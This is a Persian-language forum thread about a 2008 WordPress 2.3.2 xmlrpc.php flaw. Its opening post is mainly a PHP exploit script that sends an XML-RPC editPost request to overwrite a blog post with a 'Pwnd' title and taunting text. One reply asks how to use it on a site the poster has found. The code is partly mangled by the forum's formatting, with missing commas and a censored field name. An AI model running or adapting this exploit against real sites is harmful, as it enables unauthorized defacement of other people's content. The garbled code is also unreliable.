اطلاعیه

Collapse
No announcement yet.

WordPress 2.3.2

Collapse
This topic is closed.
X
X
 
  • Filter
  • زمان
  • Show
Clear All
new posts

  • WordPress 2.3.2

    WordPress 'xmlrpc.php' Post Edit Unauthorized Access Vulnerability
    Remote: Yes
    Published: Feb 07 2008 12:00AM

    bid : http://www.securityfocus.com/bid/27669/

    کد PHP:
    <?php

     $host 
    ''// blog url
     
    $page '/xmlrpc.php';
     
    $data '<?xml version="1.0" ?>
             <methodcall>
                     <methodname>metaWeblog.editPost</methodname>
                     <params>
                             <value>
                                     <i4>post_ID</i4>
                             </value>
                             <value>
                                     <string>username</string>
                             </value>
                             <value>
                                     <string>password</string>
                             </value>
                             <struct>
                                     <member>
                                             <name>post_type</name>
                                             <value>page</value>
                                     </member>
                                     <member>
                                             <name>title</name>
                                             <value>
                                                     <string>Pwnd</string>
                                             </value>
                                     </member>
                                     <member>
                                             <name>de******ion</name>
                                             <value>Whoo is ma biatch</value>
                                     </member>
                             </struct>
                     </params>
             </methodcall>'
    ;
      
     
    $exploited fsockopen($host80$errorNumber$errorString);  $requestHeader " ".$page."  HTTP/1.1\r\n";
     
    $requestHeader.= "Host: ".$host."\r\n";
     
    $requestHeader.= "User-Agent:      Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1) Gecko/20061010 Firefox/2.0\r\n";
     
    $requestHeader.= "Content-Type: application/x-www-form-urlencoded\r\n";
     
    $requestHeader.= "Content-Length: ".strlen($data)."\r\n";
     
    $requestHeader.= "Connection: close\r\n\r\n";
     
    $requestHeader.= $data;
     
    fwrite($exploited$requestHeader ); 
     echo 
    'done';
     
    ?>
    ايستاده مردن بهتر از زانو زده زيستن است

  • #2
    من یک سایت پیدا کردم از این wordpreee استفاده می کنه طرز کار این چه جوری است ؟
    Email : [email protected]
    Skype : ali_sniffer

    Comment


    • #3
      تاریخ تاپیک رو یه نگاه بندازی بد نیستا
      ! Security is never Complete

      Comment

      Working...
      X